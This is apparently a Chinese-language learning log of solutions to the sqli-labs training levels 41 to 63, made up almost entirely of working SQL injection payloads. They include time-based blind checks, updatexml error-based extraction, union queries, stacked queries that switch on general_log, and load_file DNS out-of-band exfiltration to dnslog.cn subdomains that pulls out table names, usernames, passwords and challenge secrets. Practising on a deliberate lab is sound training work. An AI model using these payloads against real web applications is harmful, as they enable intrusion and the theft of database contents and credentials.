一、sqli-labs靶場

1.輪子模式總結(jié)

到目前為止，我總結(jié)了一下出現(xiàn)過的輪子，可以得出一個結(jié)論，首先需要知道有幾個參數(shù)，前面6種都是單參數(shù)的，多參數(shù)的只能通過報錯信息得知，用–+還是#也要看報錯情況
①　n’ union select 1,2, ’
n可以是1，-1,n’后面可接),select后面看情況設(shè)置顯示位
②　')–+
)可選，'可換成"
③　‘) --+(
)可換成))，(可換成((，‘可換成"
④　" --+或’ #或’ --+
⑤　’ and if(1=1, sleep(1), 1)#
⑥　") and sleep(1) #
⑦　', 1, 1)#
⑧　‘) and 1 and (’
⑨　‘||1||’
⑩　‘#或‘–+
?　1’) anandd (if(1=1, sleep(1), 1)) anandd('1
?

2.Less-41 stacked Query Intiger type blind

a.注入點判斷

發(fā)現(xiàn)除了輸入正確的id值有顯示，其他輸入都沒有顯示
懷疑存在時間盲注
輸入3 and sleep(1)試下

延遲1秒
輸入3 and if(1=1, sleep(1),0)試下

還是延遲1秒
輸入3 and if(1=2, sleep(1),0)

沒有延遲
證明存在時間盲注點

b.輪子測試

輪子就是3 and if(1,sleep(1), 0)

c.獲取數(shù)據(jù)庫名稱

測試長度
3 and if(length(database())=8,sleep(1), 0)

說明長度是8
爆破字母
3 and if(substr(substr((database()), 1),1,1) = ‘s’, sleep(1), 1)

接下來我們直接使用堆疊注入，后面的內(nèi)容略過

d.堆疊注入

3 and if(length(database())=8,sleep(1), 0);
首先查看狀態(tài)
show variables like ‘%general%’;

使用堆疊注入修改設(shè)置
3 and if(length(database())=8,sleep(1), 0);set global general_log = on;

修改成功
接下來我打算使用堆疊注入+外地注入獲得更多信息

e.堆疊注入+外帶注入獲取表名

3 and if(length(database())=8,sleep(1), 0);select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit2,1),‘.6bub0w.dnslog.cn\abc’));#

說明可以通過堆疊注入獲取列名
只是外帶注入一次只能獲取一個值，也不能使用group_concat

f.堆疊注入+外帶注入獲取列名

3 and if(length(database())=8,sleep(1), 0);select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 2,1),‘.6bub0w.dnslog.cn\abc’));#

g.堆疊注入+外帶注入獲取表內(nèi)數(shù)據(jù)

3 and if(length(database())=8,sleep(1), 0);select load_file(concat(‘\\’,(select username from users where id = 8),‘.6bub0w.dnslog.cn\abc’));select load_file(concat(‘\\’,(select password from users where id = 8),‘.6bub0w.dnslog.cn\abc’));#
雖然說堆疊語句只能一個個獲取數(shù)據(jù)，但是我發(fā)現(xiàn)它可以這樣用，再加一條語句，再加一條，那樣也相當(dāng)于可以獲取多個數(shù)據(jù)了

發(fā)現(xiàn)沒有都出來了，而且這個方法也省去了測試長度爆破的麻煩，一次性獲取數(shù)據(jù)

3.Less-42 Stacked Query error based

又是二次注入？不是

因為創(chuàng)建用戶名的入口被限制了，那只能老老實實找注入點了

a.注入點判斷

發(fā)現(xiàn)注入點在主界面密碼框

觸發(fā)條件是單數(shù)單引號

b.輪子測試

通過報錯我們開始構(gòu)造輪子
報錯說明id是 “id’ ‘,即有兩層單引號
輸入2’ and 1’ --+:near ‘’’ at line 1
輸入2’and1–+:near ‘a(chǎn)nd1–+’’ at line 1
輸入2’) and 1:near ‘) and 1’’ at line 1
兩個引號怎么閉合不了呢

c.獲取數(shù)據(jù)庫名稱

2’ and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) and ’

終于出現(xiàn)了，那么輪子就是
2’ and 1 and ’
由此也可以得到一個經(jīng)驗，看引號判斷需要幾個and

d.獲取表名

2’ and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),0x7e), 0x7e) and ’

e.獲取列名

2’ and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 0,1),0x7e), 0x7e) and ’

f.獲取表內(nèi)數(shù)據(jù)

2’ and updatexml(1, concat(0x7e,(select group_concat(username,‘:’, password) from users where id = 4),0x7e), 0x7e) and ’

另外發(fā)現(xiàn)這里居然還可以用聯(lián)合注入

g.聯(lián)合注入獲取數(shù)據(jù)庫名

2’ union select 1,2,3 and’
沒有報錯，居然進去了

改成 2’ union select 1,database(),2 and’

直接拿到數(shù)據(jù)庫名了

h.聯(lián)合注入獲取表名

2’ union select 1,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),2 and’

i.聯(lián)合注入獲取列名

2’ union select 1,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 0,1),2 and’

j.聯(lián)合注入獲取表內(nèi)數(shù)據(jù)

2’ union select 1,(select group_concat(username,‘:’, password) from users),2 and’

2’ union select 1,(select group_concat(username,‘:’, password) from users where id=4),2 and’

k.堆疊注入獲取數(shù)據(jù)庫名稱

1’;select load_file(concat(‘\\’,(select database()),‘.kdah15.dnslog.cn\abc’)) and ';#

4.Less-43

a.注入點判斷

還是密碼框存在報錯注入，輸入1’報
near ‘‘1’’)’ at line 1
猜測應(yīng)該是’(‘‘id’’)‘,所以輪子應(yīng)該類似
2’) and 1 and (’

b.輪子測試

輸入2’) and 1 and ('沒有報錯，估計輪子可用

c.獲取數(shù)據(jù)庫名稱

2’) and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) and (’

d.獲取表名

2’) and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),0x7e), 0x7e) and (’

e.獲取列名

2’) and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 0,1),0x7e), 0x7e) and (’

f.獲取表內(nèi)數(shù)據(jù)

2’) and updatexml(1, concat(0x7e,(select group_concat(username,‘:’, password) from users where id = 4),0x7e), 0x7e) and (’

g.聯(lián)合注入+堆疊注入+外帶注入獲取數(shù)據(jù)庫名稱

奇怪了，這里使用堆疊注入為啥拿不到數(shù)據(jù)呢
2’) and updatexml(1,concat(0x7e,(SELECT database())),0x7e);select load_file(concat(‘\\’,(select database()),‘.igqu2e.dnslog.cn\abc’));
失敗
2’) and updatexml(1,concat(0x7e,(SELECT database())),0x7e);set global general_log = on;#
失敗
1’);select load_file(concat(‘\\’,(select database()),‘.kdah15.dnslog.cn\abc’)) and (';#

分析后發(fā)現(xiàn)原因可能是前面的報錯注入影響了后面的堆疊注入了，因為把前面的報錯注入去除就正常了，這也給了我一個教訓(xùn)，不能貪多
但是用聯(lián)合注入加堆疊注入又可以，說明就是報錯注入引起的
2’) union select 1,database(),2;select load_file(concat(‘\\’,(select database()),‘.igqu2e.dnslog.cn\abc’)) ;#

h.聯(lián)合注入+堆疊注入+外帶注入獲取表名稱

2’) union select 1,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),2;select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3,1),‘.igqu2e.dnslog.cn\abc’)) ;#

記住外帶注入里不要用group_concat，要用limit去指定取哪行

i.聯(lián)合注入+堆疊注入+外帶注入獲取列名稱

2’) union select 1,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database()),2;select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 2,1),‘.igqu2e.dnslog.cn\abc’)) ;#

j.聯(lián)合注入+堆疊注入+外帶注入獲取表內(nèi)數(shù)據(jù)

2’) union select 1,(select group_concat(username,‘:’, password) from users where id=4),2; select load_file(concat(‘\\’,(select username from users where id=4 ),‘.igqu2e.dnslog.cn\abc’)) ;#
2’) union select 1,(select group_concat(username,‘:’, password) from users where id=4),2; select load_file(concat(‘\\’,(select password from users where id=4 ),‘.igqu2e.dnslog.cn\abc’)) ;#

5.Less-44

這一關(guān)沒有報錯提示了，看來只能用盲注

a.注入點判斷

仍然是密碼框存在注入

b.獲取數(shù)據(jù)庫名稱

2’;select load_file(concat(‘\\’,(select database()),‘.ny8562.dnslog.cn\abc’));

看來這個外帶注入還是比較好用，特別是對盲注時，不用再爆破了

c.獲取表名

2’;select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0,1),‘.ny8562.dnslog.cn\abc’));select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 2,1),‘.ny8562.dnslog.cn\abc’));select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3,1),‘.ny8562.dnslog.cn\abc’));
一次性拿多條數(shù)據(jù)了

d.獲取列名

2’;select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 0,1),‘.ny8562.dnslog.cn\abc’)) ;select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 1,1),‘.ny8562.dnslog.cn\abc’)) ;select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 2,1),‘.ny8562.dnslog.cn\abc’)) ;

e.獲取表內(nèi)數(shù)據(jù)

2’;select load_file(concat(‘\\’,(select username from users where id=4 ),‘.ny8562.dnslog.cn\abc’)) ;#
2’;select load_file(concat(‘\\’,(select password from users where id=4 ),‘.ny8562.dnslog.cn\abc’)) ;#

6.Less-45

仍然是密碼框注入，需要增加括號閉合

a.獲取數(shù)據(jù)庫名稱

2’);select load_file(concat(‘\\’,(select database()),‘.xchvq5.dnslog.cn\abc’));

b.獲取表名

2’);select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0,1),‘.xchvq5.dnslog.cn\abc’));select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 2,1),‘.xchvq5.dnslog.cn\abc’));select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3,1),‘.xchvq5.dnslog.cn\abc’));

c.獲取列名

2’);select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 0,1),‘.xchvq5.dnslog.cn\abc’)) ;select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 1,1),‘.xchvq5.dnslog.cn\abc’)) ;select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 2,1),‘.xchvq5.dnslog.cn\abc’)) ;

d.獲取表內(nèi)數(shù)據(jù)

2’);select load_file(concat(‘\\’,(select username from users where id=4 ),‘.xchvq5.dnslog.cn\abc’)) ;select load_file(concat(‘\\’,(select password from users where id=4 ),‘.xchvq5.dnslog.cn\abc’)) ;#

7.Less-46

Please input parameter as SORT with numeric value

a.注入點判斷

這關(guān)啥意思呢，輸啥都看不到結(jié)果？
后來才知道需要將參數(shù)名設(shè)為sort，然后分別輸入1，2，3結(jié)果都不同，輸入4以外報錯

輸入單引號報錯，但是再輸入1個單引號報錯不會消失

b.輪子測試

1 and 1#
輸出正常

c.獲取數(shù)據(jù)庫名稱

1 and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) #

d.獲取表名

1 and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),0x7e), 0x7e)#

e.獲取列名

1 and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 0,1),0x7e), 0x7e) #

f.獲取表內(nèi)數(shù)據(jù)

1 and updatexml(1, concat(0x7e,(select group_concat(username,‘:’, password) from users where id = 4),0x7e), 0x7e)#

8.Less-47

a.注入點判斷

這一關(guān)現(xiàn)在只要不輸單引號發(fā)現(xiàn)都是這個界面，沒有變化了，咋回事

b.輪子測試

看提示，error base single quote，指的是單引號報錯，應(yīng)該需要閉合
2’ and 1 and '沒有錯誤

c.獲取數(shù)據(jù)庫名稱

2’ and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) and ’

d.獲取表名

2’ and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),0x7e), 0x7e) and ’

e.獲取列名

2’ and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 0,1),0x7e), 0x7e) and ’

f.獲取表內(nèi)數(shù)據(jù)

2’ and updatexml(1, concat(0x7e,(select group_concat(username,‘:’, password) from users where id = 4),0x7e), 0x7e) and ’

9.Less-48

a.注入點判斷

這一關(guān)是盲注，只有正常與否兩種狀態(tài)
但是好奇怪，盲注的延遲時間怎么這么久呢
3 and if(1=1,sleep(1),0)#

b.輪子測試

3 and if(1=2,sleep(1), 1) and (1)#

有延遲，顯示正確

c.獲取數(shù)據(jù)庫名稱

3 and if(1=2,sleep(1), 1) and (select load_file(concat(‘\\’,(select database()),‘.9o20ch.dnslog.cn\abc’)))#

外帶獲取數(shù)據(jù)庫名稱，記住不要把外帶注入放在if里面

d.獲取表名

3 and if(1=2,sleep(1), 1) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3,1),‘.9o20ch.dnslog.cn\abc’)))#

e.獲取列名

3 and if(1=2,sleep(1), 1) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 2,1),‘.9o20ch.dnslog.cn\abc’)))#

f.獲取表內(nèi)數(shù)據(jù)

3 and if(1=2,sleep(1), 1) and (select load_file(concat(‘\\’,(select password from users where id=4 ),‘.9o20ch.dnslog.cn\abc’)))#

10.Less-49

a.注入點判斷

單引號出現(xiàn)盲注

b.輪子測試

3’ and if(1=2,sleep(1), 1) and (1) and '#
顯示正常

c.獲取數(shù)據(jù)庫名稱

3’ and if(1=2,sleep(1), 1) and (select load_file(concat(‘\\’,(select database()),‘.9o20ch.dnslog.cn\abc’))) and '#

d.獲取表名

3’ and if(1=2,sleep(1), 1) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3,1),‘.9o20ch.dnslog.cn\abc’))) and '#

e.獲取列名

3’ and if(1=2,sleep(1), 1) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 2,1),‘.9o20ch.dnslog.cn\abc’))) and '#

f.獲取表內(nèi)數(shù)據(jù)

3’ and if(1=2,sleep(1), 1) and (select load_file(concat(‘\\’,(select password from users where id=4 ),‘.9o20ch.dnslog.cn\abc’))) and '#

11.Less-50

a.注入點判斷

加入引號發(fā)現(xiàn)有報錯提示，直接使用報錯注入

b.輪子測試

3 and if(1=1,1,0)
顯示正常

c.獲取數(shù)據(jù)庫名稱

3 and if(1=1,updatexml(1,concat(0x7e,(SELECT+database())),0x7e),0)

d.獲取表名

3 and if(1=1,updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),0x7e), 0x7e) ,0)

e.獲取列名

3 and if(1=1,updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 0,1),0x7e), 0x7e),0)

f.獲取表內(nèi)數(shù)據(jù)

3 and if(1=1,updatexml(1, concat(0x7e,(select group_concat(username,‘:’, password) from users where id = 4),0x7e), 0x7e),0)

另外發(fā)現(xiàn)這里還可以用堆疊注入
3 and if(1=1,sleep(1),0);select load_file(concat(‘\\’,(select database()),‘.d4u0mk.dnslog.cn\abc’))

12.Less-51

a.注入點判斷

單引號報錯注入

b.輪子測試

2’ and 1 and ’

c.獲取數(shù)據(jù)庫名稱

2’ and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) and ’

d.獲取表名

2’ and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),0x7e), 0x7e) and ’

e.獲取列名

2’ and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 0,1),0x7e), 0x7e) and ’

f.獲取表內(nèi)數(shù)據(jù)

2’ and updatexml(1, concat(0x7e,(select group_concat(username,‘:’, password) from users where id = 4),0x7e), 0x7e) and ’

13.Less-52

a.注入點判斷

這一關(guān)只有輸入1,2,3才有顯示，其他一概不顯示，
輸入3 and if(1=1,sleep(1),0)，有延遲，時間盲注

b.輪子測試

使用堆疊注入
3 and if(1=1,sleep(1),0);1;

c.獲取數(shù)據(jù)庫名稱

3 and if(1=1,sleep(1),0);select load_file(concat(‘\\’,(select database()),‘.j6fykz.dnslog.cn\abc’));

d.獲取表名

3 and if(1=1,sleep(1),0);select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3,1),‘.j6fykz.dnslog.cn\abc’));

e.獲取列名

3 and if(1=1,sleep(1),0);select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 2,1),‘.j6fykz.dnslog.cn\abc’));

f.獲取表內(nèi)數(shù)據(jù)

3 and if(1=1,sleep(1),0);select load_file(concat(‘\\’,(select password from users where id=4 ),‘.j6fykz.dnslog.cn\abc’));

14.Less-53

這一關(guān)和上一關(guān)的區(qū)別是需要加單引號注入

a.獲取數(shù)據(jù)庫名稱

3’ and if(1=1,sleep(1),0);select load_file(concat(‘\\’,(select database()),‘.j6fykz.dnslog.cn\abc’));

b.獲取表名

3’ and if(1=1,sleep(1),0);select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database()%20 limit 3,1),‘.j6fykz.dnslog.cn\abc’));

c.獲取列名

3’ and if(1=1,sleep(1),0);select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 3, 1) and table_schema=database() limit 2,1),‘.j6fykz.dnslog.cn\abc’));

d.獲取表內(nèi)數(shù)據(jù)

3’ and if(1=1,sleep(1),0);select load_file(concat(‘\\’,(select password from users where id=4 ),‘.j6fykz.dnslog.cn\abc’));

15.Less-54

a.注入點判斷

54關(guān)又不一樣了

意思是它會給你10次試錯機會，10次還是失敗的話重置所有隨機數(shù)據(jù)
首先url輸入id

然后輸入key,每次報錯都會累加已嘗試的次數(shù)
但是怎么看不到報錯呢，是在url里注入嗎，id里發(fā)現(xiàn)加單引號不顯示，再加又有顯示，說明存在盲注

b.輪子測試

那么輪子怎么構(gòu)造呢，對，那就不用管下面那個輸入框了，直接url注入就行了
1’ and if(1=1,sleep(1),0) and (1)–+

延遲1秒，說明正確

c.獲取數(shù)據(jù)庫名稱

1’ and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select database()),‘.lx01qu.dnslog.cn\abc’)))–+

數(shù)據(jù)庫名稱是challanges

d.獲取表名

1’ and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0,1),‘.lx01qu.dnslog.cn\abc’)))–+

看來只有一個表

e.獲取列名

1’ and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 2, 1),‘.63lr5q.dnslog.cn\abc’)))–+

實際表格如下

f.獲取表內(nèi)數(shù)據(jù)

首先需要先獲取表名和列名，然后帶入才能獲取數(shù)據(jù)
vamnq7byet
secret_VEKS
1’ and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select secret_VEKS from vamnq7byet where id=1 ),‘.63lr5q.dnslog.cn\abc’)))–+

下面的輸入框輸入Sn04znQcZJNl6L0tADgOhcRS提示正確

英文表示：祝賀你成功了

16.Less-55

a.注入點判斷

這次可以試錯14次，是難度減低了還是提高了
不管他，先看下怎么注入，發(fā)現(xiàn)除了數(shù)字其他都不顯示，看來要盲注了

b.輪子測試

4 and if(1=1,sleep(1),0) and (1)#

出現(xiàn)延時，那輪子應(yīng)該就是它了

c.獲取數(shù)據(jù)庫名稱

4 and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select database()),‘.leccsl.dnslog.cn\abc’)))#
單獨運行select有數(shù)據(jù)，但是為啥界面沒結(jié)果呢

大概是語句哪里還是不對吧，重新構(gòu)造輪子

1. and if(1=1,1,0) and (1)–+
   

嗯這里有顯示才能用，之前的輪子沒顯示，難怪怎么都沒反應(yīng)，所以記住了，以后構(gòu)造的輪子一定要顯示結(jié)果才行
1)and if(1=1,1,0) and (select load_file(concat(‘\\’,(select database()),‘.f1xl21.dnslog.cn\abc’)))–+

d.獲取表名

1)and if(1=1,1,0) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0,1),‘.f1xl21.dnslog.cn\abc’)))–+

uhf25xqo3t

e.獲取列名

1)and if(1=1,1,0) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 2, 1),‘.f1xl21.dnslog.cn\abc’)))–+

secret_WUAZ

f.獲取表內(nèi)數(shù)據(jù)

1. and if(1=1,1,0) and (select load_file(concat(‘\\’,(select secret_WUAZ from uhf25xqo3t where id=1),‘.f1xl21.dnslog.cn\abc’)))–+
   

記住，sql語句里不要插入回車符
d7oT09Des0BDFr51bmmpn0Gv
輸入這串?dāng)?shù)字成功過關(guān)

17.Less-56

a.注入點判斷

還是這種題，看來后面都是這種類型的，單引號盲注報錯注入

b.輪子測試

4’) and (1) --+
正常輸出，記住了，像這樣才是對的

c.獲取數(shù)據(jù)庫名稱

4’) and (select load_file(concat(‘\\’,(select database()),‘.6oq86c.dnslog.cn\abc’))) --+

d.獲取表名

4’) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0,1),‘.6oq86c.dnslog.cn\abc’))) --+

9q15lsxx4o

e.獲取列名

4’) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 2, 1),‘.6oq86c.dnslog.cn\abc’))) --+

secret_F62S

f.獲取表內(nèi)數(shù)據(jù)

4’) and (select load_file(concat(‘\\’,(select secret_F62S from 9q15lsxx4o where id=1),‘.6oq86c.dnslog.cn\abc’))) --+

MRS84WI5bRz1wUEPRjwkOTNN

18.Less-57

a.注入點判斷

雙引號注入，沒什么好說的

b.輪子測試

4" and (1)–+

c.獲取數(shù)據(jù)庫名稱

4" and (select load_file(concat(‘\\’,(select database()),‘.6oq86c.dnslog.cn\abc’))) --+

d.獲取表名

4" and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0,1),‘.6oq86c.dnslog.cn\abc’)))–+

kxkae71r4p

e.獲取列名

4" and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 2, 1),‘.6oq86c.dnslog.cn\abc’)))–+

secret_R3DQ

f.獲取表內(nèi)數(shù)據(jù)

4" and (select load_file(concat(‘\\’,(select secret_R3DQ from kxkae71r4p where id=1),‘.6oq86c.dnslog.cn\abc’)))–+

qCPyRxfEqRmVzBQYyVQ5Y3h9

19.Less-58

a.注入點判斷

終于出現(xiàn)報錯注入了

b.輪子測試

2’ and (1) --+

c.獲取數(shù)據(jù)庫名稱

2’ and (updatexml(1,concat(0x7e,(SELECT+database())),0x7e)) --+

d.獲取表名

2’ and (updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),0x7e), 0x7e)) --+

k9e8a7yl0f

e.獲取列名

2’ and (updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 0,1),0x7e), 0x7e)) --+

secret_58RO

f.獲取表內(nèi)數(shù)據(jù)

2’ and (updatexml(1, concat(0x7e,(select secret_58RO from k9e8a7yl0f where id = 1),0x7e), 0x7e)) --+

Vd6Sg7IYEnmoKrdsx3u74wAa

20.Less-59

a.注入點判斷

報錯注入，不用加引號啥的

b.輪子測試

2 and 1 --+

c.獲取數(shù)據(jù)庫名稱

2 and updatexml(1,concat(0x7e,(SELECT+database())),0x7e)–+

d.獲取表名

2 and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),0x7e), 0x7e) --+

qi7pnhikpv

e.獲取列名

2 and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 0,1),0x7e), 0x7e) --+

secret_OLE6

f.獲取表內(nèi)數(shù)據(jù)

2 and updatexml(1, concat(0x7e,(select secret_OLE6 from qi7pnhikpv where id = 1),0x7e), 0x7e) --+

2229WftWHjdVjMEaS6yr9O3a

21.Less-60

a.注入點判斷

雙引號報錯注入，但是需要括號閉合

b.輪子測試

3") and 1 --+

c.獲取數(shù)據(jù)庫名稱

3") and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) --+

d.獲取表名

3") and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),0x7e), 0x7e) --+

hofp86ahow

e.獲取列名

3") and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 0,1),0x7e), 0x7e) --+

secret_NAX1

f.獲取表內(nèi)數(shù)據(jù)

3") and updatexml(1, concat(0x7e,(select secret_NAX1 from hofp86ahow where id = 1),0x7e), 0x7e) --+

0CxW5gDfT4RrJWkO371mJwmU

22.Less-61

a.注入點判斷

單引號報錯注入，但是需要雙括號閉合

b.輪子測試

3’)) and 1 --+

c.獲取數(shù)據(jù)庫名稱

3’)) and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) --+

d.獲取表名

3’)) and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = database()),0x7e), 0x7e) --+

jy0p59437z

e.獲取列名

3’)) and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 0,1),0x7e), 0x7e) --+

secret_AX65

f.獲取表內(nèi)數(shù)據(jù)

3’)) and updatexml(1, concat(0x7e,(select secret_AX65 from jy0p59437z where id = 1),0x7e), 0x7e) --+

zJn62X2QZ1xqyyJLUdkCeqEu

23.Less-62

a.注入點判斷

單引號盲注

b.輪子測試

3’) and if(1=1,sleep(1),0) and (1) --+

延遲1秒，另外盲注不需要看顯示，報錯和聯(lián)合注入才需要，只看延遲就行

c.獲取數(shù)據(jù)庫名稱

3’) and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select database()),‘.vsc4qg.dnslog.cn\abc’))) --+

d.獲取表名

3’) and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0,1),‘.vsc4qg.dnslog.cn\abc’))) --+

06pq63s5ri

e.獲取列名

3’) and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 2, 1),‘.vsc4qg.dnslog.cn\abc’))) --+

secret_KXH7

f.獲取表內(nèi)數(shù)據(jù)

3’) and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select secret_KXH7 from 06pq63s5ri where id=1),‘.vsc4qg.dnslog.cn\abc’))) --+

eyhWTtqVrtmuDFdoYsQHfs6W

24.Less-63

a.注入點判斷

還是單引號盲注，估計還是需要判斷閉合

b.輪子測試

3’ and if(1=1,sleep(1),0) and (1) --+

居然不用考慮閉合

c.獲取數(shù)據(jù)庫名稱

3’ and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select database()),‘.vsc4qg.dnslog.cn\abc’))) --+

d.獲取表名

3’ and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0,1),‘.vsc4qg.dnslog.cn\abc’))) --+

62ru7lcvyu

e.獲取列名

3’ and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name=(select table_name FROM information_schema.tables WHERE table_schema = database() limit 0, 1) and table_schema=database() limit 2, 1),‘.vsc4qg.dnslog.cn\abc’))) --+

secret_VS47

f.獲取表內(nèi)數(shù)據(jù)

3’ and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select secret_VS47 from 62ru7lcvyu where id=1),‘.vsc4qg.dnslog.cn\abc’))) --+

